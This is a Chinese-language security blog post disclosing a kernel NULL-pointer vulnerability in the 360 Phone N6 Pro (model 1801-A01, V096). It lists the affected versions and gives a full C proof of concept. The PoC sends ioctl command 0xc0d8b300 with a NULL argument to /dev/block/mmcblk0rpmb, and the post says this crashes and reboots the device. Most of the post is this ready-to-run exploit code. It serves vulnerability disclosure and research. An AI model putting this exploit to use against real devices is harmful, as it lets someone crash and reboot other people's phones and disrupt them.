360 Phone N6 Pro内核漏洞

admin 2022年1月6日01:13:37安全博客评论16 views1262字阅读4分12秒阅读模式

一、漏洞简介

360 Phone N6 Pro V096内核组件中的内核模块允许攻击者使用命令3235427072在设备/ dev / block / mmcblk0rpmb上通过ioctl的自变量注入精心设计的自变量,并导致内核崩溃。

二、漏洞影响

  • 名称:360 Phone N6 Pro
  • 型号:1801-A01
  • 安卓版本:7.1.1
  • 版本号:V096
  • 内核版本:Linux localhost 4.4.21-perf#1 SMP PREEMPT Wed Mar 28 28 15:24:20 UTC 2018 aarch64

三、复现过程


poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
/*
* This is poc of 360 N6 Pro, 1801-A01
* Android Version: 7.1.1
* Version Number: V096
* Kernel Version: Linux localhost 4.4.21-perf #1 SMP PREEMPT Wed Mar 28 15:24:20 UTC 2018 aarch64
* A NULL pointer bug in the ioctl interface of device file /dev/block/mmcblk0rpmb causes the system crash via IOCTL 3235427072.
* This Poc should run with permission to do ioctl on /dev/block/mmcblk0rpmb.
*/
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/block/mmcblk0rpmb";
static command = 3235427072; // 0xc0d8b300

int main(int argc, char **argv, char **env) {
int fd = 0;
fd = open(driver, O_RDWR);
if (fd < 0) {
printf("Failed to open %s, with errno %dn", driver, errno);
system("echo 1 > /data/local/tmp/log");
return -1;
}

printf("Try ioctl device file '%s', with command 0x%x and payload NULLn", driver, command);
printf("System will crash and reboot.n");
if(ioctl(fd, command, NULL) < 0) {
printf("Allocation of structs failed, %dn", errno);
system("echo 2 > /data/local/tmp/log");
return -1;
}
close(fd);
return 0;
}

FROM :ol4three.com | Author:ol4three

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日01:13:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  360 Phone N6 Pro内核漏洞 http://cn-sec.com/archives/721492.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: